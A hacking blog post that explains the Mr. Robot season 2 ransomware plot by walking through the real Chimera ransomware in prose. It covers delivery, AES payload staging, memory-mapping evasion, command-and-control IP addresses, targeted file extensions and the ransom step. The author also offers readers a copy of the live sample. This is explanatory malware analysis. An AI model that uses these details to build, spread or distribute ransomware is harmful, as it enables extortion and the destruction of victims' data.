Welcome back, my greenhorn hackers!
As expected, the much anticipated return of Mr. Robot did not disappoint!
For those of you who are new to Mr. Robot, Elliot Alderson is an asocial IT security engineer who teams up a with a group of hackers (f/society) determined to use their hacking skills to make a better world. They were able to seriously damage the data on the world's largest holder of consumer and student debt, Evil Corp, last season. Elliot, played brilliantly by Rami Malek, suffers from delusions involving his late father, played by Christian Slater. As season two begins, Elliot is trying to "recover" and gain a grip on his delusions while staying with his mother, while the world financial system is reeling from a global financial crisis brought on by the f/society hack of Evil Corp.
In this series of articles, rather than recount the story details of this brilliant TV series, I will attempt to show how each of the realistic hacks of this show are done. We had two major hacks in this first episode, the ransomware against Evil Corp and the SmartHome hack of the Evil Corp's General Counsel.
In this first episode of season 2, f/society was able to infect Evil Corp's data with ransomware. Ransomware is a type of malware that has become very popular in recent years. After infecting the victim's computer, it then encrypts their data making it unusable. The victim can only recover their data after paying a ransom to get the key to decrypt it. Generally, the ransoms are relatively small, usually in the $300-500 range, but there have been cases where hospitals and other large institutions have paid $20,000 or more.
Let's take a look at an example of some actual ransomware that was captured in the wild to better understand how it works. Although there is no way to know for certain what ransomware f/society used, all ransonware tends function similarly. To understand how the f/society ransomware works, let's look at Chimera, a variant of the ransomware genre of malware found in Germany.
Using Chimera as an Example
Most ransomware has been used against consumers, but Chimera--like the the f/society ransomware-- has been used to attack businesses in Germany. Since most ransomware works similarly, let's use it as a model for how f/society encrypted the data and ransomed on Evil Corp for $5.9m!
In this analysis, I will summarize how Chimera works, leaving out some steps for the sake of brevity. If you would like a copy of Chimera to conduct your own thorough analysis, I have posted it in my Pastebin account here.
Step 1: Delivering the Malware
Like much of the ransomware that has appeared in recent years, Chimera was delivered by email, likely with a social engineering component to get someone to click on a link or a file (in this episode, Darlene uses the Social Engineering Toolset in Kali to load the ransomware onto a flash drive). Chimera was written in .NET.
In this first stage, Chimera initially delivers an executable stub, whose only job is to call, decrypt, and decode the second stage payload, to the victim.
Step 2: The AES Algorithm
The second stage is the encrypted and encoded payload that contains a method that is clearly an AES encryption algorithm. Very likely, f/society would have it run in multiple threads to speed up the process. Considering the fact that Evil Corp has petabytes of data, encrypting it all would take some time.
Step 3: Mapping to Memory
In the next stage, Chimera then manually maps its processes to memory. This is very likely to bypass ASLR and DEP protections that are built into Windows and other operating systems. These protections randomize where a process will likely be in memory, making it more difficult to implement a buffer overflow, as the malware cannot predict the location of the pointer. By manually mapping the process to memory, it makes it more likely that the malware will function as expected.
Step 4: Find 32-Bit Process to Host
Next, Chimera goes through every Windows process looking for a 32-bit process that can host its payload and then open it.
Step 5: Finding the Local IP
Next, this ransomware goes out and finds the public IP of the machine it has infected by using www.whatismyipaddress.com. It then stores that value in a variable.
Step 6: Call Back to Command & Control Servers
Once Chimera has the IP of the infected host, it then calls out to its command and control (C&C) servers. In this case, those servers are at 126.96.36.199 and 188.8.131.52.
Chimera uses Bitmessage to communicate via a P2P protocol on ports 8444 and 8080. Bitmessage is a secure, encrypted P2P messaging system that enables a single person to send out messages to one or many recipients. You can see in the screenshot below that Chimera calls the Bitmessage client PyBitmessage.
Step 7: Browse & Find Hard Drives, Then Files
Next, the malware must find the hard drives where the data is stored. It needs to browse each of the logical drives and then store these locations into a variable for later use in the encryption process.
Step 8: Get Random Key
Now that this ransomware has successfully taken over a 32-bit process, mapped itself to memory to avoid ASLR, and enumerated the hard drives, it needs to call back to its command and control server to get a random key with which to encrypt the files.
Once the random key has been obtained from the command and control server, Chimera calls the function from Step #2 above—the AES encryption algorithm—and begins to encrypt critical files.
Before it starts the encryption, it looks for the following file types:
.jpg, .jpeg, .xml, .xsl, .wps, .cmf, .vbs, .accdb, .ini, .cdr, .svg, .conf, .config, .wb2, .msg, .azw, .azw1, .azw3, .azw4, .lit, .apnx, .mobi, .p12, .p7b, .p7c, .pfx, .pem, .cer, .key, .der, .mdb, .htm, .html, .class, .java, .asp, .aspx, .cgi, .php, .jsp, .bak, .dat, .pst, .eml, .xps, .sqllite, .sql, .jar, .wpd, .crt, .csv, .prf, .cnf, .indd, .number, .pages, .x3f, .srw, .pef, .raf, .rf, .nrw, .nef, .mrw, .mef, .kdc, .dcr, .crw, .eip, .fff, .iiq, .k25, .crwl, .bay, .sr2, .ari, .srf, .arw, .cr2, .raw, .rwl, .rw2, .r3d, .3fr, .eps, .pdd, .dng, .dxf, .dwg, .psd, .png, .jpe, .bmp, .gif, .tiff, .gfx, .jge, .tga, .jfif, .emf, .3dm, .3ds, .max, .obj, .a2c, .dds, .pspimage, .yuv, .3g2, .3gp, .asf, .asx, .mpg, .mpeg, .avi, .mov, .flv, .wma, .wmv, .ogg, .swf, .ptx, .ape, .aif, .av, .ram, .m3u, .movie, .mp1, .mp2, .mp3, .mp4, .mp4v, .mpa, .mpe, .mpv2, .rpf, .vlc, .m4a, .aac, .aa3, .amr, .mkv, .dvd, .mts, .vob, .3ga, .m4v, .srt, .aepx, .camproj, .dash, .zip, .rar, .gzip, ., mdk, .mdf, .iso, .bin, .cue, .dbf, .erf, .dmg, .toast, .vcd, .ccd, .disc, .nrg, .nri, .cdi
These file types are likely critical to the business operation. These are graphics files, spreadsheet files, database files, backup files, email files, Java files, audio files, movie files, and encryption keys. Without them, the business is crippled.
Step 9: Ransom Request
Finally, Chimera makes a ransom request to the business owner. Note that the browser and its associated files are exempt from the encryption to enable the browser request and receive the payment of the ransom.
I hope this helps you to understand how f/society was able to ransom Evil Corp for $5.9 and I will attempt to demonstrate each and every hack from season 2, so keep coming back to Hackers-Arise, my greenhorn hackers!